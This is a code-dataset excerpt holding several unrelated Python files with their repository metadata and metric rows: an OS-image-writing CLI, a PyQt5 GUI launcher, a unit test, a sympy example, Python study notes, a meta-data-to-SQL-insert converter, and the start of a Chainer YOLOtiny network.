| 19 | 74 | 0.434783 | 40 | 437 | 4.525 | 0.525 | 0.132597 | 0.088398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.414188 | 437 | 22 | 75 | 19.863636 | 0.707031 | 0.121281 | 0 | 0 | 0 | 0 | 0.232687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.166667 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d331cf8fdbde34709011fa6dbc66e215380c30c3 | 4,650 | py | Python | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
if show:
traceback.print_exc()
print(file=sys.stderr)
click.echo(msg, file=sys.stderr)
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
ctx.ensure_object(dict)
ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
"""Create a provisioning configuration."""
try:
provisioning.create(hidden)
except Exception as exc:
eprint(f'Creating provisioning configuration failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
type=click.Path(file_okay=False),
default='~/.cache/bake-a-py',
help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
encrypted):
"""Write the image.
OS is the image name (one of the results of the list command).
    This command downloads, extracts, checks integrity, writes, and provisions
    if necessary.
"""
try:
iu.write(os, image_cache, output, target, chksum, become, remove, keep,
encrypted)
except Exception as exc:
eprint(f'Writing failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
"""Provision the os on OUTPUT for TARGET.
TARGET is the name of the configuration file.
"""
try:
iu.provision(target, output, encrypted)
except Exception as exc:
eprint(f'Provisioning failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
"""Mount all partitions on DEVICE."""
try:
iu.udisks2.mount(device)
except Exception as exc:
eprint(f'Mounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
"""Unmount all partitions on DEVICE."""
try:
iu.udisks2.unmount(device)
except Exception as exc:
eprint(f'Unmounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
"""List available OS images."""
try:
if all:
result = iu.get_all_images()
else:
result = iu.get_raspios_flavors()
click.echo('\n'.join(result))
except Exception as exc:
eprint(f'Listing OS images failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
"""Display the description of the OS image NAME.
"""
try:
desc = iu.get_image_description(name)
if verbose:
click.echo(desc)
else:
click.echo(desc['description'])
except Exception as exc:
eprint(f'Displaying description of {name} failed ({exc}).',
ctx.obj['TRACEBACK'])
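# Illustrative usage sketch (not part of the original module); the command
# name, OS image name, and device path below are hypothetical examples:
#
#   bake-a-py list
#   bake-a-py describe raspios_lite_armhf
#   bake-a-py write raspios_lite_armhf -o /dev/sdX --chksum --become
#   bake-a-py provision mytarget -o /dev/sdX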
if __name__ == '__main__':
cli(obj={}) | 31 | 79 | 0.641505 | 596 | 4,650 | 4.932886 | 0.248322 | 0.052381 | 0.043537 | 0.051701 | 0.39932 | 0.347619 | 0.305782 | 0.236395 | 0.236395 | 0.169728 | 0 | 0.000545 | 0.210108 | 4,650 | 150 | 80 | 31 | 0.799891 | 0.093548 | 0 | 0.4 | 0 | 0 | 0.287747 | 0.011095 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0.075 | 0.05 | 0 | 0.125 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3356a95eb136cde9fb2ff5f5c78c32c6a43c33c | 7,264 | py | Python | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | 1 | 2022-03-04T01:55:40.000Z | 2022-03-04T01:55:40.000Z | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cellPoseUI.ui'
# Created by: PyQt5 UI code generator 5.11.3
import os, platform, ctypes, sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontDatabase
from scellseg.guis.scellsegUi import Ui_MainWindow
class scellsegGui(Ui_MainWindow):
def __init__(self, image=None, parent = None):
super(scellsegGui, self).__init__(parent)
self.setupUi(self)
self.splitter.setSizes([500, 250])
self.splitter.handle(1).setAttribute(Qt.WA_Hover, True)
self.splitter2.handle(1).setAttribute(Qt.WA_Hover, True)
def closeEvent(self, event):
answer = QtWidgets.QMessageBox.question(self, 'Close', 'Close Scellseg',
QtWidgets.QMessageBox.Yes |
QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No)
if answer == QtWidgets.QMessageBox.Yes:
event.accept()
elif answer == QtWidgets.QMessageBox.No:
event.ignore()
def start_gui():
Translucent = 'rgba(255,255,255,0)'
Primary = '#fafafa'
PrimaryLight = '#C0C0C0'
ListColor = '#F0F0F0'
SliderColor = '#0078D7'
LabelColor = '#7A581E'
BlackColor = '#000000'
BtnColor = '#0066FF'
Secondary = '#D3D3D3'
SecondaryLight = '#D3D3D3'
SecondaryDark = '#D3D3D3'
SecondaryText = '#000000'
border_image_path = os.path.dirname(os.path.abspath(__file__)).replace('\\', '/') + '/assets/slider_handle.png'
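    # The stylesheet is assembled below as a list of string fragments; the
    # {0:s} placeholders are filled per-fragment with str.format, and the
    # pieces are joined with newlines in app.setStyleSheet('\n'.join(sheet)).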
sheet = [
'QWidget',
'{',
'outline: 0;',
'font: 11pt "文泉驿微米黑";',
'selection-color: {0:s};'.format(SecondaryText),
'selection-background-color: {0:s};'.format(Secondary),
' } ',
        'QSlider::handle:horizontal#rangeslider',
'{',
'border-image: url({0:s});'.format(border_image_path),
'}',
'QLabel#label_seg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_batchseg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_getsingle',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QSplitter::handle:horizontal',
'{',
'width: 10px;',
'}',
'QSplitter::handle:vertical',
'{',
'height: 10px;',
'}',
'QSplitter::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QSplitter::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QSplitter::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QTableView',
'{',
'background-color: {0:s};'.format(ListColor),
'border-style: none;',
'}',
'QHeaderView',
'{',
'background-color: {0:s};'.format(Translucent),
'border-bottom: 2px solid #505050',
'}',
'QHeaderView::section',
'{',
'background-color: {0:s};'.format(Translucent),
'border-bottom: 2px solid #505050',
'}',
'QMenuBar',
'{',
'background-color: {0:s};'.format(Primary),
'border-width: 1px;',
'border-style: none;',
'border-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'margin: 0px;',
'}',
'QMenuBar::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QMenu',
'{',
'background-color:{0:s};'.format(PrimaryLight),
'border-width: 2px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'margin: 0px;',
'}',
        'QMenu::separator',
        '{',
        'height: 2px;',
'background-color: {0:s};'.format(Primary),
'margin: 0px 2px;',
'}',
'QMenu::icon:checked',
'{',
'background-color: {0:s};'.format(Secondary),
'border-width: 1px;',
'border-style: solid;',
'border-color: {0:s};'.format(Primary),
'}',
'QMenu::item',
'{',
'padding: 4px 25px 4px 20px;',
'}',
'QMenu::item:selected',
'{',
'background-color: {0:s};'.format(Secondary),
'color: {0:s};'.format(SecondaryText),
'}',
'QToolBox::tab',
'{',
'background-color: {0:s};'.format(SecondaryLight),
'border: 2px solid #e3e3e3;',
'padding: 5px;',
'}',
'QToolBox::tab:selected',
'{',
'background-color: {0:s};'.format(SecondaryDark),
'color: {0:s};'.format(SecondaryText),
'border: 2px solid #333;',
'}',
'QWidget#page,QWidget#page_2,QWidget#page_3',
'{',
        'background-color: #F0F0F0;',
# 'background-image: url(./assets/background.jpg);',
'}',
'QProgressBar {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 2px;',
'background-color: {0:s};'.format(SecondaryLight),
'}',
'QProgressBar::chunk {',
'border: 1px solid rgb(0,0,0);',
'border-radius: 0px;',
'background-color: {0:s};'.format(SecondaryDark),
'width: 10px;',
'margin: 2px;',
'}',
'QLabel#jLabelPicture',
'{',
'border-width: 2px;',
'border-radius: 0px;',
'border-style: solid;',
'border-color: {0:s};'.format(SecondaryDark),
'}',
'QScrollBar,QScrollBar::add-line,QScrollBar::add-page,QScrollBar::sub-line,QScrollBar::sub-page',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar:horizontal',
'{',
'height: 10px;',
'}',
'QScrollBar:vertical',
'{',
'width: 10px;',
'}',
'QScrollBar::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QScrollBar::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QScrollBar::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
]
app = QtWidgets.QApplication(sys.argv)
loadedFontID = QFontDatabase.addApplicationFont(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "assets", "Font", "wqy-microhei.ttc"))
print('operating system: ', platform.system())
if platform.system() == 'Windows':
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("scellseg")
gui = scellsegGui()
app.setStyleSheet('\n'.join(sheet))
gui.show()
sys.exit(app.exec_())
if __name__ == "__main__":
start_gui() | 30.016529 | 116 | 0.499587 | 638 | 7,264 | 5.623824 | 0.299373 | 0.018952 | 0.075808 | 0.119565 | 0.422798 | 0.389911 | 0.316332 | 0.244426 | 0.185619 | 0.129877 | 0 | 0.03596 | 0.318557 | 7,264 | 242 | 117 | 30.016529 | 0.688889 | 0.025055 | 0 | 0.542453 | 1 | 0.004717 | 0.350592 | 0.078104 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014151 | false | 0 | 0.023585 | 0 | 0.042453 | 0.004717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d33d05aa2036a3db33dfe5549b91f4bc1ae6e12f | 770 | py | Python | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 115 | 2017-11-08T02:24:31.000Z | 2022-02-10T19:03:57.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 511 | 2017-12-05T15:23:09.000Z | 2022-02-22T19:38:43.000Z | test/visualization/test_visualize.py | wukathryn/axondeepseg | b5533f37d5337759fd0fd4186e286cb201b66c65 | [
"MIT"
] | 35 | 2017-11-30T13:36:28.000Z | 2022-01-10T18:11:06.000Z | # coding: utf-8
from pathlib import Path
import pytest
from AxonDeepSeg.visualization.visualize import visualize_training
class TestCore(object):
def setup(self):
# Get the directory where this current file is saved
self.fullPath = Path(__file__).resolve().parent
# Move up to the test directory, "test/"
self.testPath = self.fullPath.parent
self.pathModel = (
self.testPath /
'__test_files__' /
'__test_model__' /
'Model'
)
def teardown(self):
pass
# --------------visualize_training tests-------------- #
@pytest.mark.unit
def test_visualize_training_runs_successfully(self):
assert visualize_training(str(self.pathModel))
| 24.0625 | 66 | 0.615584 | 81 | 770 | 5.592593 | 0.580247 | 0.15011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.271429 | 770 | 31 | 67 | 24.83871 | 0.805704 | 0.202597 | 0 | 0 | 0 | 0 | 0.054366 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 1 | 0.166667 | false | 0.055556 | 0.166667 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d33de8c495b1c5d04c26434bb941307d1b085eba | 441 | py | Python | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | normal_forms/examples/normal_form/07.py | joepatmckenna/normal_forms | e506304295a2592cfc050a2a688add89715aa5ff | [
"MIT"
] | null | null | null | from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
f1 = 6 * x + x**2 + x * y + x * z + y**2 + y * z + z**2
f2 = 2 * y + x**2 + x * y + x * z + y**2 + y * z + z**2
f3 = 3 * z + x**2 + x * y + x * z + y**2 + y * z + z**2
return f1, f2, f3
h = normal_form(f, (0, 0, 0), 2)
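# normal_form computes the normal form of f around the equilibrium (0, 0, 0)
# up to degree 2; h.fun holds the resulting vector field components and
# h.jet.var the state variables (x, y, z).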
# coeff of z**2
print h.fun[0].coeff(h.jet.var[2]**2)
| 27.5625 | 81 | 0.512472 | 97 | 441 | 2.298969 | 0.371134 | 0.035874 | 0.040359 | 0.053812 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0.161435 | 0 | 0.095847 | 0.290249 | 441 | 15 | 82 | 29.4 | 0.616613 | 0.210884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.222222 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34b8ae8f80579fd68134d835709ce8d49d3681c | 1,822 | py | Python | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | 1 | 2018-04-04T09:26:21.000Z | 2018-04-04T09:26:21.000Z | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | python.io/study-20180412.py | cnzht/grit | eab457a0a9b216f5a6026669095b8126bf8a9e1d | [
"MIT"
] | null | null | null | #-*-coding:utf-8-*-
#bodyBMI.py
# 2018-04-11 21:03:12
# Print a particular part of a string
'''
import random
st = [1,1,15,1,5,8,1,5,8]
print (random.shuffle(st))
'''
'''
# Compute PI using the Monte Carlo method
from random import random
from time import perf_counter
DATA = pow(1000,100)
hit = 0
start = perf_counter()
for i in range(1,DATA+1):
x,y = random(),random()
if pow((x**2)+(y**2),0.5)<=1:
hit+=1
PI = 4*(hit/DATA)
print("圆周率PI={}".format(PI))
print("程序运行时间={}".format(start-perf_counter()))
'''
'''
# Compute the factorial of N using a function definition
n = 10
sr = [1,2,5,23,92,14,20,1]
def fact(m=1):
global n
for i in range(1,n):
n*=i
return n//m
print(fact())
print("最大的是:{}\n最小的是:{}".format(max(sr),min(sr)))
'''
'''
# Review of earlier material
sr = ['sa','ad']
print(''.join(sr))
'''
'''
# Turtle progress bar
import time
import turtle as t
t.setup(600,600,200,200)
t.pensize(12)
t.pencolor('red')
t.bk(100)
t.done()
'''
'''
try:
st = str(input())
print(st)
except:
print("error!")
else:
print("right")
finally:
print("end")
'''
'''
for i in range(1,10+1):
if i==8:
continue
print(i)
print('xx')
'''
# Week 5: learning about functions
# Variable-length arguments
'''
def fact(n,*b):
s = 1
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s
print (fact(10,2,3,4))
'''
'''
s = 10
def fact(n,*b):
global s
for i in range (1,n):
s+=i
for iteam in b:
s*=iteam
return s,b
a,b = fact(10,2,3,4)
print (a,b)
'''
# A local variable of a composite data type that is not re-created locally behaves like the global variable.
'''
#eg1
ls = ['d','f']
def func(a):
ls.append(a)
return
func('c')
print(ls)
#eg2
ls = ['d','f']
def func(a):
    ls = [] # ls is redefined here, so it is created as a local variable.
ls.append(a)
return
func('c')
print(ls)
'''
'''
dc = lambda a,b : a+b=1 # wrong: assignment is not allowed inside a lambda
print(dc(10,12))
dc = lambda a,b : a+b # correct way
print(dc(10,12))
'''
'''
# A lambda with no parameters.
dc = lambda :"武汉大学" # the lambda body cannot contain a print statement
print(dc())
'''
| 12.565517 | 53 | 0.540615 | 314 | 1,822 | 3.130573 | 0.369427 | 0.012208 | 0.030519 | 0.055951 | 0.241099 | 0.198372 | 0.160732 | 0.134283 | 0.079349 | 0.079349 | 0 | 0.07431 | 0.224479 | 1,822 | 144 | 54 | 12.652778 | 0.620665 | 0.053238 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 0 | null | null | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34d9ab7f21732e1b05d7bd300bd84ebde6c1a49 | 8,421 | py | Python | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 1 | 2016-09-25T16:41:57.000Z | 2016-09-25T16:41:57.000Z | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | null | null | null | src/main/tools/dbpy/meta_to_db_data.py | inqwell/inq | 31ce4cd6b9b123b1ec4462905ccbcf7c00d6efc3 | [
"BSD-3-Clause"
] | 2 | 2016-09-25T16:48:49.000Z | 2020-05-26T20:00:33.000Z | #!/usr/local/bin/bash
"""
Two options:
1) Build DB-specific data files from meta-data files
2) Build a single file containing all the DB-specific 'insert' statements in the correct dependency
order from meta-data files and XML table files
NOTE:
- The data files must be named "xxx.dat"; for option (2) the corresponding XML table file must be
  "xxx.xml"
- For option (2), the data must be tab-separated
$Header: /home/inqwell/cvsroot/dev/scripts/python/meta_to_db_data.py,v 1.1 2009/05/22 22:15:44 sanderst Exp $
$Author: sanderst $
$DateTime: 2009/05/01 17:04:46 $
$Change: 165582 $
"""
import xml.etree.ElementTree as ET
from xml_to_db_utils import get_table_info
from xml_to_db_utils import get_table_creation_order
import xml_to_mysql_utils
import xml_to_oracle_utils
# Mapping from DB type to function taking a Xylinq name and returning its DB-compatible name
_name_func_by_db_type = {
"mysql" : xml_to_mysql_utils.get_db_compatible_name,
"oracle": xml_to_oracle_utils.get_db_compatible_name,
}
# Mapping from DB type to meta-data converter class
_meta_data_converter_cls_by_db_type = {
"mysql" : xml_to_mysql_utils.MetaDataConverter,
"oracle": xml_to_oracle_utils.MetaDataConverter,
}
def meta_data_text_to_db_data_text(meta_data_text, db_type):
"""
Convert a meta-data text into a DB-specific data text.
@param IN meta_data_text Meta-data text
@param IN db_type DB type (MySQL, Oracle, ...)
@return A DB-specific data text
"""
# Get the DB-specific meta-data converter class
try:
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
return db_data_text
def meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep=None):
"""
Convert a list of meta-data texts (along with table info objects) into a text containing insert
statement for a given database.
@param IN info_and_data_list List of TableInfo object and meta-data text pairs
@param IN db_type DB type (MySQL, Oracle, ...)
@param IN db_statement_sep Separator to use for the insert statements; default: ";"
@return The insert statements as a string
"""
if db_statement_sep is None:
db_statement_sep = ";"
# Get the DB-specific functions/classes
try:
xy_to_db_name_func = _name_func_by_db_type[db_type.lower()]
meta_data_converter = _meta_data_converter_cls_by_db_type[db_type.lower()]()
except KeyError:
raise Exception("DB type not supported: '%s'" % db_type)
# Identify the order of insertion
info_and_data_by_table_name = dict([(item[0].name, item) for item in info_and_data_list])
table_info_list = [item[0] for item in info_and_data_list]
table_order = get_table_creation_order(table_info_list)
# Process each table in the insertion order
output_lines = []
for table_name in table_order:
table_info, meta_data_text = info_and_data_by_table_name[table_name]
# Convert the meta-data in the data text
db_data_text = meta_data_converter.meta_to_db_text(meta_data_text)
# Get the DB table and column names
db_table_name = xy_to_db_name_func(table_name)
db_col_names = [xy_to_db_name_func(col_info.name) for col_info in table_info.columns]
db_col_list_str = ", ".join(db_col_names)
nb_col_names = len(db_col_names)
# Process the data rows
rows = db_data_text.splitlines()
for row in rows:
row = row.strip()
if not row or row.startswith("//"):
continue
values = row.split("\t")
if len(values) != nb_col_names:
raise Exception("Incorrect number of values (%d expected):\n%s" % (nb_col_names,
values))
insert_statement = "INSERT INTO %s (%s) VALUES (%s)%s" % (
db_table_name,
db_col_list_str,
", ".join(values),
db_statement_sep)
output_lines.append(insert_statement)
return "\n".join(output_lines)
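# Illustrative sketch (not part of the original script): building the insert
# statements for a single two-column table. The XML file name and the
# tab-separated row values below are hypothetical examples.
#
#     table_info = get_table_info(ET.parse("xy_user.xml").getroot())
#     meta_text = "1\t'alice'\n2\t'bob'\n"
#     print meta_data_to_db_insert_text([(table_info, meta_text)], "mysql")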
def main():
import glob
from optparse import OptionParser
import os
parser = OptionParser()
parser.add_option("--mode", dest="mode", help="'data_files' or 'insert_file'")
parser.add_option("--meta_data_dir", dest="meta_data_dir", help="Input directory for meta-data "
"files")
parser.add_option("--xml_dirs", dest="xml_dirs", help="Input directories for XML table files; "
"'insert_file' mode only")
parser.add_option("--out_dir", dest="output_dir", help="Output dir for data files; 'data_files'"
" mode only")
parser.add_option("--out", dest="output_file", help="Output file for insert statements; "
"'insert_file' mode only")
parser.add_option("--db", dest="db_type", help="DB type: MySQL, Oracle, ...")
parser.add_option("--sep", dest="db_statement_sep", help="Separator for the insert statements; "
"'insert_file' mode only")
options, dummy = parser.parse_args()
mode = options.mode
if mode is None:
raise Exception("Missing mandatory argument '--mode'")
meta_data_dir = options.meta_data_dir
if meta_data_dir is None:
raise Exception("Missing mandatory argument '--meta_data_dir'")
db_type = options.db_type
if db_type is None:
raise Exception("Missing mandatory argument '--db'")
if mode == "data_files":
output_dir = options.output_dir
if output_dir is None:
raise Exception("Missing mandatory argument '--out_dir'")
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
print "Processing meta-data file %s" % meta_data_file
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
# Convert the meta-data into DB-specific data
db_data_text = meta_data_text_to_db_data_text(meta_data_text, db_type)
# Build the DB-specific data file
db_data_file = os.path.join(output_dir, os.path.basename(meta_data_file))
fh = open(db_data_file, "w")
try:
fh.write(db_data_text)
finally:
fh.close()
elif mode == "insert_file":
xml_dir_list = options.xml_dirs
if xml_dir_list is None:
raise Exception("Missing mandatory argument '--xml_dirs'")
xml_dir_list = [item.strip() for item in xml_dir_list.split(",")]
output_file = options.output_file
if output_file is None:
raise Exception("Missing mandatory argument '--out'")
db_statement_sep = options.db_statement_sep
if db_statement_sep:
db_statement_sep = db_statement_sep.replace("\\n", "\n")
info_and_data_list = []
meta_data_files = glob.glob(os.path.join(meta_data_dir, "*.dat"))
for meta_data_file in meta_data_files:
# Read the corresponding XML table file
for xml_dir in xml_dir_list:
xml_file = os.path.join(xml_dir, "%s.xml" %
os.path.splitext(os.path.basename(meta_data_file))[0])
if os.path.exists(xml_file):
break
else:
raise Exception("No XML table file found for meta-data file %s" % meta_data_file)
table_elt_tree = ET.parse(xml_file)
table_elt = table_elt_tree.getroot()
table_info = get_table_info(table_elt)
# Read the data file
fh = open(meta_data_file)
try:
meta_data_text = fh.read()
finally:
fh.close()
info_and_data_list.append((table_info, meta_data_text))
output_text = meta_data_to_db_insert_text(info_and_data_list, db_type, db_statement_sep)
fh = open(output_file, mode="w")
try:
fh.write(output_text)
finally:
fh.close()
else:
raise Exception("Unknown mode: '%s'" % mode)
if __name__ == "__main__":
main()
| 37.426667 | 109 | 0.652535 | 1,213 | 8,421 | 4.224237 | 0.173124 | 0.084309 | 0.032787 | 0.020492 | 0.42096 | 0.343091 | 0.295082 | 0.242779 | 0.169009 | 0.169009 | 0 | 0.006845 | 0.254008 | 8,421 | 224 | 110 | 37.59375 | 0.808819 | 0.071844 | 0 | 0.248227 | 0 | 0 | 0.147907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.056738 | null | null | 0.007092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d34dea71189d3afc7d4964aa6dbd49339356c594 | 3,806 | py | Python | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | 9 | 2016-12-22T00:49:45.000Z | 2020-02-09T02:02:25.000Z | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | YOLOtiny_chainer_v2/YOLOtiny.py | ashitani/ppap_detect | 5aec43e8486c49d106392c926a5a6738ff498ac4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
from chainer import training
from chainer.training import extensions
def darknetConv2D(in_channel,out_channel, bn=True):
if (bn):
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
n = L.BatchNormalization(out_channel,use_beta=False,eps=0.000001),
b = L.Bias(shape=[out_channel,]),
)
else:
return Chain(
c = L.Convolution2D(in_channel,out_channel, ksize=3, pad=1,nobias=True),
b = L.Bias(shape=[out_channel,]),
)
def CRP(c, h, stride=2, pooling=True):
# convolution -> leakyReLU -> MaxPooling
h = c.b( c.n( c.c(h),test=True))
h = F.leaky_relu(h,slope=0.1)
if pooling:
h = F.max_pooling_2d(h,ksize=2,stride=stride,pad=0)
return h
class YOLOtiny(Chain):
def __init__(self):
super(YOLOtiny, self).__init__(
c1 = darknetConv2D(3,16),
c2 = darknetConv2D(None,32),
